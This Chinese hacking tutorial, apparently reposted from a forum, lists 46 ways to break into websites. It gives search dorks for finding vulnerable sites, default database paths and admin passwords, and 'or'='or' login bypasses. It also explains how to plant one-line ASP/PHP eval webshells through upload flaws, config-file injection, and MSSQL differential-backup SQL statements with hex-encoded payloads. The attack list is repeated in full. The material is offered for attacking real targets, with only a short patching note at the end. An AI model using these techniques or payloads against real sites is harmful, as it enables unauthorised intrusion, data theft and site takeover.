***網站並不難,46種常見***方法

1,


到GoogLe,搜索一些關鍵字,edit.asp?    韓國肉雞爲多,多數爲MSSQL數據庫!


2,


到Google ,site:cq.cn inurl:asp


3,


利用挖掘雞和一個ASP***.


文件

名是login.asp


路徑組是/manage/


關鍵詞是 went.asp


用'or'='or'來登陸


4,


關鍵字:Co Net MIB Ver 1.0網站後臺管理

系統

帳號密碼爲 'or'='or'


5.


動感購物系統


inurl:help.asp 登陸,如未註冊成爲會員!


upLoad_bm1.asp和upLoad_c1.asp這兩個隨便選個,一般管理員都忽視了這2漏洞


6。


默 認數據庫地址blogdata/acblog.asa


    關鍵字:acblog


7.


百度 /htdocs


註冊裏可以 直接上傳asa文件!


8.


/Database/#newasp.mdb


關鍵詞:NewAsp SiteManageSystem Version


9.


用挖掘機              


關鍵字:Powered by WEBBOY


頁 面:/upfile.asp


10.


baidu中搜索關鍵字Ver5.0 Build 0519


(存在上傳漏洞)


11.


Upfile_Article.asp bbs/upfile.asp


輸入關鍵字:powered by mypower ,


12.


inurl:winnt\system32\inetsrv\ 在google裏面輸入這個就可以找到很多

網站

13.


現在GOOGLE搜索關鍵字      intitle:網站小 助手 inurl:asp


14.


鍵字: 首頁 最新動態 新手指南 舞曲音樂 下載中心 經典文章 玩家風采裝備


購買 站內流言 友情連接 本站

論壇

挖掘雞的關鍵字 添    setup.asp


15.


VBulletin 論壇的數據庫


默認數據庫地址!


/includes/functions.php


工具:


1.網站獵手 下載地址:百度 Google!


2.Google


關鍵字:


Powered by: vBulletin Version 3.0.1


Powered by: vBulletin Version 3.0.2


Powered by: vBulletin Version 3.0.3


其 中一個就可以了


16.


1.打開百度或GOOGLE搜索,輸入powered by comersus ASP shopping cart


open source。 這是一個商場系統。


2.網站的最底部分,有個 Comersus Open Technologies LC。打開看下


~~comersus系統~


猜到,comersus.mdb. 是數據庫名


數據庫都是 放在database/ 後的,


所以database/comersus.mdb


comersus_listCategoriesTree.asp 換成database/comersus.mdb,不能下載。


那樣把前一個''store/''除去,再加上database /comersus.mdb 試試


17.


無憂傳奇官方站點程序。


          1、後臺管理地址:http://您的域名 /msmiradmin/


          2、默認後臺管理帳號:msmir


          3、默認後臺管理密 碼:msmirmsmir


數據庫文件爲 http://您的域名/msmirdata/msmirArticle.mdb


數據庫連接文件 爲 ***********/Conn.asp


18.


百度裏輸入/skins/default/


19.


利用挖掘機


關 鍵機:power by Discuz


路徑:/wish.php


配合:


Discuz!論壇 wish.php遠程包含漏洞 工具使用


20.


上傳漏洞.


工具 : Domain3.5


        網站獵手 1.5版


關鍵字 powered by mypower


檢測的頁面或文件插入upfile_photo.asp


21.


新雲漏洞


這個漏洞 ACCESS和SQL版通吃。


Google搜索關鍵字 "關於本站 - 網站幫助 - 廣告合作 - 下載聲明 - 友情連接


- 網站地圖 - 管理登錄"


把flash/downfile.asp?url=uploadfile/../../conn.asp提交到網站根目 錄。就


可以下載conn.asp


以源碼,

軟件

等下載站居多。


大家時常碰到數據庫如果前面或者中間+了# 可以用%23替換就可以下載了


\database\%23newasp.mdb


如:#xzws.mdb 改成%23xzws.mdb


22.


通 吃所有商城+動力上傳系統


使用工具:挖掘雞 v1.1 明小子


商城***:


關鍵字:選購->加入購物車->去收銀臺 ->確認收貨人信息->選付款方式->選配送


方式->在線支付或下單後匯款->匯款確認->發貨-> 完成


漏洞頁面:upload.asp


          upfile_flash.asp


動力***:


關鍵 字:powered by mypower


漏洞頁面:upfile_photo.asp


          Upfile_Soft.asp


          upfile_adpic.asp


          upfile_softpic.asp


23.


注 射漏洞


百度搜索ioj's blog


24


動易


列目錄


admin_articlerecyclebin.asp


inurl:admin_articlerecyclebin.asp


25.


工 具:網站獵手


關鍵詞:inurl:Went.asp


後綴:manage/login.asp


口令:'or'='or'


26.


入 侵魔獸私服


需要的工具:ASP***一隻。


            Domain3.5明小子


關鍵字:All Right Reserved Design:遊戲聯盟


後臺地址:admin/login.asp


數據庫的地 址:chngame/#chngame.mdb


27.


漏洞是利用管理員iis設置的失誤


用baidu 關鍵字就是比較罕見的腳本名


動網: ReloadForumCache.asp


Leadbbs: makealltopanc.asp


BBSXP: admin_fso.asp


動易: admin_articlerecyclebin.asp


28.


國外站的爆庫漏洞


關 鍵字:sad Raven's Guestbook


密碼地址:/passwd.dat


後臺地址:/admin.php


29.


Discuz 4.1.0跨站漏洞


利用工具:1,WAP瀏覽器


          2,WAP編碼轉換器


關鍵字:"intextiscuz! 4.1.0"


30.


關鍵字:尚奈克斯


後臺路徑/system/manage.asp


直接傳ASP***


31.


工 具


1:網站獵手


2:大馬一個


關鍵字:切勿關閉Cookies功能,否則您將不能登錄


插入diy.asp


32.


關 鍵字:Team5 Studio All rights reserved


默認數據庫:data/team.mdb


33.


工 具:      挖掘機 輔臣數據庫讀取器


關鍵字:    企業簡介 產品展示產品列表


後綴添加: /database/myszw.mdb


後臺地址: admin/Login.asp


34.


關鍵子    XXX inurl:Nclass.asp


在"系統設置"裏寫個***。


會被保存到 在 config.asp內。


35.


不進後臺 照樣拿動網WEBSHELL


data.asp?action=BackupData          動網數據庫備份默認路徑


36.


工 具:網站獵手 WebShell


關鍵字:inurl:Went.asp


後綴:manage/login.asp


弱口 令:'or'='or'


37.


關鍵字owered byCDN_NEWS


隨便掃遍文章加一個' ,來試探注入點


後臺地 址:admin_index.asp


38.


***雷池新聞發佈系統


關鍵字:leichinews


去掉leichinews 後面的.


打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp


再 上傳馬.....


進訪問uppic anran.asp 登陸馬.


39.


關鍵字ower System Of Article Management Ver 3.0 Build 20030628


默認數據 庫:database\yiuwekdsodksldfslwifds.mdb


後臺地址:自己掃描!


40.


一、通過 GOOGLE搜索找大量注入點


關鍵字:asp?id=1      gov.jp/ asp?id=


頁數:100


語言:想***哪 個國家就填

什麼

語言吧


41.


關鍵字:Powered by:94KKBBS 2005


利 用密碼找回功能 找回admin


提問:ddddd 回答:ddddd


42.


關鍵字:inurl:Went.asp


後臺爲 manage/login.asp


後臺密碼: 'or'=' 或者 'or''=''or' 登錄 進入


默認數據庫地址 atabase/DataShop.mdb


43.


關鍵字:六合彩 inurl:readnews.asp


把最後一個/改成%5c ,直接暴庫,看密碼,進後臺


隨便添加個新聞 在標題輸入我們的一句話***


44.


工具:一句話***


      BBsXp 5.0 sp1 管理員猜解器


關鍵詞:powered by bbsxp5.00


進後臺,備份一句話馬!


45.


關鍵 字:程序核心:BJXSHOP網上開店專家


後臺:/admin


46


批量***新雲系統!


搜索關鍵詞:關於本站 網站幫助 廣告合作 下載聲明 友情連接 網站


地圖


找到以後綴添加:user/reg.asp


工具:啊D注入D_SQLTools2.0 和COOKIES欺騙工具


先來註冊 發佈個文章 得到的地址用啊D掃下 他默認的表段名字是NC_admin



轉載請註明出自*** 手冊技術論壇

http://www.nohack.cn/bbs/

本 貼地址:

http://www.nohack.cn/bbs/thread-92388-1-1.html



一: 對MD5密碼.有時我們不是哪麼容易跑出來.如果是[SQL數據庫].那麼我們可以用以下命令:


http://注入網址;update admin set password='新MD5密碼' where password='舊MD5密碼'-- [admin爲表名.]



一、 直接上傳獲得webshell



  這種對php和jsp的一些程序比較常見,MolyX BOARD就是其中一例,直接在心情圖標管理上傳.php類型,雖然沒有提示,其實已經成功了,上傳的文件url應該是

http://forums/images/smiles/

下,前一陣子的聯衆遊戲站和 網易的jsp系統漏洞就可以直接上傳jsp文件。文件名是原來的文件名,bo-blog後臺可以可以直接上傳.php文件,上傳的文件路徑有提示。以及一 年前十分流行的upfile.asp漏洞(動網5.0和6.0、早期的許多整站系統),因過濾上傳文件不嚴,導致用戶可以直接上傳webshell到網站 任意可寫目錄中,從而拿到網站的管理員控制權限。



  二、添加修改上傳類型



  現在很多的腳本程序上傳模塊不是隻允 許上傳合法文件類型,而大多數的系統是允許添加上傳類型,bbsxp後臺可以添加asa asP類型,ewebeditor的後臺也可添加asa類型,通 過修改後我們可以直接上傳asa後綴的webshell了,還有一種情況是過濾了.asp,可以添加.aspasp的文件類型來上傳獲得 webshell。php系統的後臺,我們可以添加.php.g1f的上傳類型,這是php的一個特性,最後的哪個只要不是已知的文件類型即可,php會 將php.g1f作爲.php來正常運行,從而也可成功拿到shell。LeadBbs3.14後臺獲得webshell方法是:在上傳類型中增加asp ,注意,asp後面是有個空格的,然後在前臺上傳ASP馬,當然也要在後面加個空格!



  三、利用後臺管理功能寫入webshell



  上傳漏洞基本上補的也差不多了,所以我們進入後臺後還可以通過修改相關文件來寫入webshell。比較的典型的有 dvbbs6.0,還有leadbbs2.88等,直接在後臺修改配置文件,寫入後綴是asp的文件。而LeadBbs3.14後臺獲得webshell 另一方法是:添加一個新的友情鏈接,在網站名稱處寫上冰狐最小馬即可,最小馬前後要隨便輸入一些字符,http:\\網站\inc\IncHtm \BoardLink.asp就是我們想要的shell。



  四、利用後臺管理向配置文件寫webshell



  利 用"""":""//"等符號構造最小馬寫入程序的配置文件,joekoe論壇,某某同學錄,沸騰展望新聞系統,COCOON Counter統計程序等等,還有很多php程序都可以,COCOON Counter統計程序舉例,在管理郵箱處添上

[email protected]

":eval request(chr (35))//, 在配製文件中就是webmail="

[email protected]

\":eval request(chr(35))//",還有一種方法就是寫上

[email protected]

" %><%eval request(chr(35))%><%',這樣就會形成前後對應,最小馬也就運行了。<%eval request(chr(35))%>可以用lake2的eval發送端以及最新的2006 客戶端來連,需要說明的是數據庫插馬時候要選前者。再如動易2005,到文章中心管理-頂部菜單設置-菜單其它特效,插入一句話馬"%> <%execute request("l")%><%',保 存頂部欄目菜單參數設置成功後,我們就得到馬地址http://網站/admin/rootclass_menu_config.asp。



   五、利用後臺數據庫備份及恢復獲得webshell



  主要是利用後臺對access數據庫的“備份數據庫”或“恢復數據庫”功能, “備份的數據庫路徑”等變量沒有過濾導致可以把任意文件後綴改 爲asp,從而得到webshell,msssql版的程序就直接應用了access版的代碼,導致sql版照樣可以利用。還可以備份網站asp文件爲其 他後綴 如.txt文件,從而可以查看並獲得網頁源代碼,並獲得更多的程序信息增加獲得webshell的機會。在實際運用中經常會碰到沒有上傳功能的時 候,但是有asp系統在運行,利用此方法來查看源代碼來獲得其數據庫的位置,爲數據庫插馬來創造機會,動網論壇就有一個ip地址的數據庫,在後臺的ip管 理中可以插入最小馬然後備份成.asp文件即可。在談談突破上傳檢測的方法,很多asp程序在即使改了後綴名後也會提示文件非法,通過在.asp文件頭加 上gif89a修改後綴爲gif來騙過asp程序檢測達到上傳的目的,還有一種就是用記事本打開圖片文件,隨便粘貼一部分複製到asp***文件頭,修改 gif後綴後上傳也可以突破檢測,然後備份爲.asp文件,成功得到webshell。



  六、利用數據庫壓縮功能



   可以將數據的防下載失效從而使插入數據庫的最小馬成功運行,比較典型的就是loveyuki的L-BLOG,在友情添加的url出寫上<%eval request (chr(35))%>, 提交後,在數據庫操作中壓縮數據庫,可以成功壓縮出.asp文件,用海洋的最小馬的eval客戶端連就得到一個webshell。




七、 asp+mssql系統



  這裏需要提一點動網mssql版,但是可以直接本地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假 圖片,然後記住其上傳路徑。寫一個本地提交的表單,代碼如下:



  <form action=http://網站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post">



  <p>已上傳文件的位置:<input name="Dbpath" type="text" size="80"></p>



  <p>要複製到的位置:<input name="backpath" type="text" size="80"></p>



  <p><input type="submit" value="提交"></p> </form>



  另存爲.htm本地執行。把假圖片上傳路徑填在“已上傳文件的位置”那裏,想要備份的WebShell的相對路徑填寫在“要複製到 的位置”那裏,提交就得到我們可愛的WebShell了,恢復代碼和此類似,修改相關地方就可以了。沒有遇到過後臺執行mssql命令比較強大的asp程 序後臺,動網的數據庫還原和備份是個擺設,不能執行sql命令備份webshell,只能執行一些簡單的查詢命令。可以利用mssql注入差異備份 webshell,一般後臺是顯示了絕對路徑,只要有了注入點基本上就可以差異備份成功。下面是差異備份的主要語句代碼,利用動網7.0的注入漏洞可以用 差異備份一個webshell,可以用利用上面提到的方法,將conn.asp文件備份成.txt文件而獲得庫名。



  差異備份的主要 代碼:



  ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--



  ;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--



   ;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--



   ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--



  這段代碼中,0x626273是要備份的庫名bbs的十六進制,可以是其 他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六進制,是lp最小馬;0x643A5C7765625C312E617370是d:\web\1.asp的十六進制, 也就是你要備份的webshell路徑。當然也可以用比較常見備份方式來獲得webshell,唯一的不足就是備份後的文件過大,如果備份數據庫中有防下 載的的數據表,或者有錯誤的asp代碼,備份出來的webshell就不會成功運行,利用差異備份是成功率比較高的方法,並且極大的減少備份文件的大小。



  八、php+mysql系統



  後臺需要有mysql數據查詢功能,我們就可以利用它執行SELECT ... INTO OUTFILE查詢輸出php文件,因爲所有的數據是存放在mysql裏的,所以我們可以通過正常手段把我們的webshell代碼插入mysql在利用 SELECT ... INTO OUTFILE語句導出shell。


  就可以暴出路徑,php環境中比較容易暴出絕對路徑:)。提一點的是 遇到是mysql在win系統下路徑應該這樣寫。下面的方法是比較常用的一個導出webshell的方法,也可以寫個vbs添加系統管理員的腳本導出到啓 動文件夾,系統重起後就會添加一個管理員帳號


  就會在up目錄下生成文件名爲saiy.php內容爲的最小php***, 最後用lanker的客戶端來連接。實際運用中要考慮到文件夾是否有寫權限。或者輸入這樣的代碼 將會在當前目錄生成一個a.php的最小馬。



   九、phpwind論壇從後臺到webshell的三種方式



  方式1 模板法



  進入後臺, 風格模版設置 ,在隨便一行寫代碼,記住,這代碼必須頂着左邊行寫,代碼前面不可以有任何字符。



  方始2 髒話過濾法



  方式3 用戶等級管理



  以上三種方式得到webshellr的密碼是a,爲lanker的一句話後門服務端。



  十、也 可以利用網站訪問計數系統記錄來獲得webshell



  解決方案



  由於本文涉及的代碼版本很多,所以不可能提供 一個完美的解決方案。有能力者可以針對本文提到的漏洞文件進行適當修補,若漏洞文件不影響系統使用也可刪除此文件。大家如果不會修補,可以到相關官方網站 下載最新補丁進行修復更新。同時也請大家能時刻關注各大

安全網絡

發佈的最新公告,若自己發現相關漏洞也可及時通知官方網站




                                                             二 搜索肉機



1,


到GoogLe,搜索一些關鍵字,edit.asp? 韓國肉雞爲多,多數爲MSSQL數據庫!


2,


到Google ,site:cq.cn inurl:asp


3,


利用挖掘雞和一個ASP***.


文件名是login.asp


路徑組是 /manage/


關鍵詞是went.asp


用'or'='or'來登陸


4,


關鍵字:Co Net MIB Ver 1.0網站後臺管理系統


帳號密碼爲 'or'='or'


5.


動感購物系統


inurl:help.asp登陸,如未註冊成 爲會員!


upLoad_bm1.asp和upLoad_c1.asp這兩個隨便選個,一般管理員都忽視了這2漏洞


6。


默認數據庫 地址blogdata/acblog.asa


關鍵字:acblog


7.


百度 /htdocs


註冊裏可以直接上傳asa文 件!


8.


/Database/#newasp.mdb


關鍵詞:NewAsp SiteManageSystem Version


9.


用 挖掘機


關鍵字:Powered by WEBBOY


頁面:/upfile.asp


10.


baidu中搜索關鍵字 Ver5.0 Build 0519


(存在上傳漏洞)


11.


Upfile_Article.asp bbs/upfile.asp


輸入關鍵字:powered by mypower ,


12.


inurl:winnt\system32\inetsrv\ 在google裏面輸入這個就可以找到很多網站


13.


現在GOOGLE搜索關鍵字 intitle:網站小助手 inurl:asp


14.


鍵 字: 首頁 最新動態 新手指南 舞曲音樂 下載中心 經典文章 玩家風采裝備


購買 站內流言 友情連接 本站論壇


挖掘雞的關鍵字 添 setup.asp


15.


VBulletin論壇的數據庫


默認數據庫地址!


/includes/functions.php


工 具:


1.網站獵手 下載地址:百度 Google!


2.Google


關鍵字:


Powered by: vBulletin Version 3.0.1


Powered by: vBulletin Version 3.0.2


Powered by: vBulletin Version 3.0.3


其中一個就可以了


16.


1.打開百度或GOOGLE搜索,輸入 powered by comersus ASP shopping cart


open source。 這是一個商場系統。


2.網站的 最底部分,有個 Comersus Open Technologies LC。打開看下


~~comersus系統~


猜 到,comersus.mdb. 是數據庫名


數據庫都是放在database/ 後的,


所以database/comersus.mdb


comersus_listCategoriesTree.asp 換成database/comersus.mdb,不能下載。


那樣把前一個''store/''除去,再加上database /comersus.mdb 試試


17.


無憂傳奇官方站點程序。


1、後臺管理地址:http://您的域名 /msmiradmin/


2、默認後臺管理帳號:msmir


3、默認後臺管理密碼:msmirmsmir


數據庫文件爲 http://您的域名/msmirdata/msmirArticle.mdb


數據庫連接文件爲 ***********/Conn.asp


18.


百 度裏輸入/skins/default/


19.


利用挖掘機


關鍵機:power by Discuz


路 徑:/wish.php


配合:


Discuz!論壇 wish.php遠程包含漏洞 工具使用


20.


上傳漏洞.


工 具 : Domain3.5


網站獵手 1.5版


關鍵字powered by mypower


檢測的頁面或文件插入 upfile_photo.asp


21.


新雲漏洞


這個漏洞ACCESS和SQL版通吃。


Google搜索關鍵字 "關於本站 - 網站幫助 - 廣告合作 - 下載聲明 - 友情連接


- 網站地圖 - 管理登錄"


把 flash/downfile.asp?url=uploadfile/../../conn.asp提交到網站根目錄。就


可以下載 conn.asp


以源碼,軟件等下載站居多。


大家時常碰到數據庫如果前面或者中間+了# 可以用%23替換就可以下載了


\database\%23newasp.mdb


如:#xzws.mdb 改成%23xzws.mdb


22.


通吃所有商城+動力上傳系統


使用工具:挖掘雞 v1.1 明小子


商城***:


關 鍵字:選購->加入購物車->去收銀臺->確認收貨人信息->選付款方式->選配送


方式->在線支付或下單 後匯款->匯款確認->發貨->完成


漏洞頁面:upload.asp


upfile_flash.asp


動力 ***:


關鍵字:powered by mypower


漏洞頁面:upfile_photo.asp


Upfile_Soft.asp


upfile_adpic.asp


upfile_softpic.asp


23.


注 射漏洞


百度搜索ioj's blog


24


動易


列目錄


admin_articlerecyclebin.asp


inurl:admin_articlerecyclebin.asp


25.


工 具:網站獵手


關鍵詞:inurl:Went.asp


後綴:manage/login.asp


口令:'or'='or'


26.


入 侵魔獸私服


需要的工具:ASP***一隻。


Domain3.5明小子


關鍵字:All Right Reserved Design:遊戲聯盟


後臺地址:admin/login.asp


數據庫的地址:chngame/#chngame.mdb


27.


漏 洞是利用管理員iis設置的失誤


用baidu 關鍵字就是比較罕見的腳本名


動網: ReloadForumCache.asp


Leadbbs: makealltopanc.asp


BBSXP: admin_fso.asp


動易: admin_articlerecyclebin.asp


28.


國外站的爆庫漏洞


關鍵字:sad Raven's Guestbook


密碼地址:/passwd.dat


後臺地址:/admin.php


29.


Discuz 4.1.0跨站漏洞


利用工具:1,WAP瀏覽器


2,WAP編碼轉換器


關鍵字:"intextiscuz! 4.1.0"


30.


關 鍵字:尚奈克斯


後臺路徑/system/manage.asp


直接傳ASP***


31.


工具


1:網站獵手


2: 大馬一個


關鍵字:切勿關閉Cookies功能,否則您將不能登錄


插入diy.asp


32.


關鍵字:Team5 Studio All rights reserved


默認數據庫:data/team.mdb


33.


工具: 挖掘機 輔臣數據庫讀取器


關鍵字: 企業簡介 產品展示產品列表


後綴添加: /database/myszw.mdb


後臺地址: admin/Login.asp


34.


關鍵子 XXX inurl:Nclass.asp


在"系統設置"裏寫個***。


會 被保存到 在 config.asp內。


35.


不進後臺照樣拿動網WEBSHELL


data.asp?action=BackupData 動網數據庫備份默認路徑


36.


工具:網站獵手 WebShell


關鍵字:inurl:Went.asp


後 綴:manage/login.asp


弱口令:'or'='or'


37.


關鍵字owered byCDN_NEWS


隨便 掃遍文章加一個' ,來試探注入點


後臺地址:admin_index.asp


38.


***雷池新聞發佈系統


關鍵 字:leichinews


去掉leichinews後面的.


打 上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp


再上傳 馬.....


進訪問uppic anran.asp 登陸馬.


39.


關鍵字ower System Of Article Management Ver 3.0 Build 20030628


默認數據 庫:database\yiuwekdsodksldfslwifds.mdb


後臺地址:自己掃描!


40.


一、通過 GOOGLE搜索找大量注入點


關鍵字:asp?id=1 gov.jp/ asp?id=


頁數:100


語言:想***哪個國家就填 什麼語言吧


41.


關鍵字:Powered by:94KKBBS 2005


利用密碼找回功能 找回admin


提 問:ddddd 回答:ddddd


42.


關鍵字:inurl:Went.asp


後臺爲manage/login.asp


後 臺密碼: 'or'=' 或者 'or''=''or' 登錄 進入


默認數據庫地址atabase/DataShop.mdb


43.


關 鍵字:六合彩 inurl:readnews.asp


把最後一個/改成%5c ,直接暴庫,看密碼,進後臺


隨便添加個新聞 在標題輸入我們的一句話***


44.


工具:一句話***


BBsXp 5.0 sp1 管理員猜解器


關鍵詞:powered by bbsxp5.00


進後臺,備份一句話馬!


45.


關鍵字:程序核心:BJXSHOP網上開店專家


後 臺:/admin


46


批量***新雲系統!


搜索關鍵詞:關於本站 網站幫助 廣告合作 下載聲明 友情連接 網站


地圖


找 到以後綴添加:user/reg.asp


工具:啊D注入D_SQLTools2.0和COOKIES欺騙工具


先來註冊 發佈個文章 得到的地址用啊D掃下 他默認的表段名字是NC_admin









鍵字:Power WenDay Ver1.0


添加: /db/PW_SYS_Data.mdb


關鍵字:powered by WEBBOY


添加: /upfile.asp


關鍵字:Powered By :SMT Version 5.0


添加: /bbs/upfile.asp /upfile_flash.asp


關鍵字:team5 studio all rights reserved


添加: /data/team.mdb


關鍵字:傳奇私服


添加: /msmirdata/msmirArticle.mdb(默認數據庫)


後 臺管理地址:http;//您的域名/msmiradmin/


關鍵字:同城約會 賀卡傳情 情感隨筆 熱門投票


添加: /admin/upload_file.asp (明小子上傳)


關鍵字: 公司後臺


添加: /manage/Login.asp (用"or"="or")


關鍵字:企業郵局 企業榮譽 營銷網絡 產品分類 信息反饋 聯繫我們 收藏本站 網站管理


添加: /admin/login.asp (後臺管理地址,管理員帳號密碼=admin)


關鍵字:by wygk


添加:/data /scadata.mdzhaozhon


關鍵字: Power System Of Article Management Ver 3.0 Build 20030628


添加: /database\yiuwekdsodksldfslwifds.mdb (後臺的後綴全是/admin_index.asp)



關鍵字: Foosun


添加: /Foosun_Data/FS400.mdbAdmin/login.asp (後臺的後綴全是admin/login.asp)


關鍵 字:Powered By Kesion Inc


默認數據庫 ks_data/ks_database.mdb


關鍵字: inurl:qq.txt (啊拉)


inurl:Mz.txt (極限居)


inurlQCJB.txt (QQ衝擊波)


inurl:qqnum.txt (完美)


1、如在網站中找到諸如:“請登錄後再使用本功能!”這樣的就可以用明小子上傳試試


2、使用明小子上傳時選擇“動力上傳漏洞— /upfile_softpic.asp頁面”



明小子關鍵詞:


1.ProductShow.asp?ArticleID=


2.inurl:show_news.asp?id=


3.site inurl:Article_Print.asp


9.4.edit.asp?


5.site:cq.cn inurl:asp


6.intitle: 網站小助手


7.powered by comersus ASP shopping cart


open source


8./skins/default/


9. 動力上傳系統


10.oioj's blog


11.動網: ReloadForumCache.asp


12."intext:Discuz! 4.1.0"


13.尚奈克斯


14.Team5 Studio All rights reserved


15.XXX inurl:Nclass.asp


16.Powered by:QCDN_NEWS


17.發佈系統


18.asp?id=1


19.Powered by:94KKBBS 2005


20.inurl:readnews.asp


21.程序核心


經典的用戶名密碼


'or'='or'


'or'1'='1


這 2個密碼在很多網站後臺,QQ空間相冊都可以登陸,不過不是100%而已....


inurl: 用於搜索網頁上包含的URL. 這個語法對尋找網頁上的搜索,幫助之類的很有用.


intext: 只搜索網頁<body>部分中包含的文字(也就是忽略了標題,URL等的文字).


site: 可以限制你搜索範圍的域名.

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章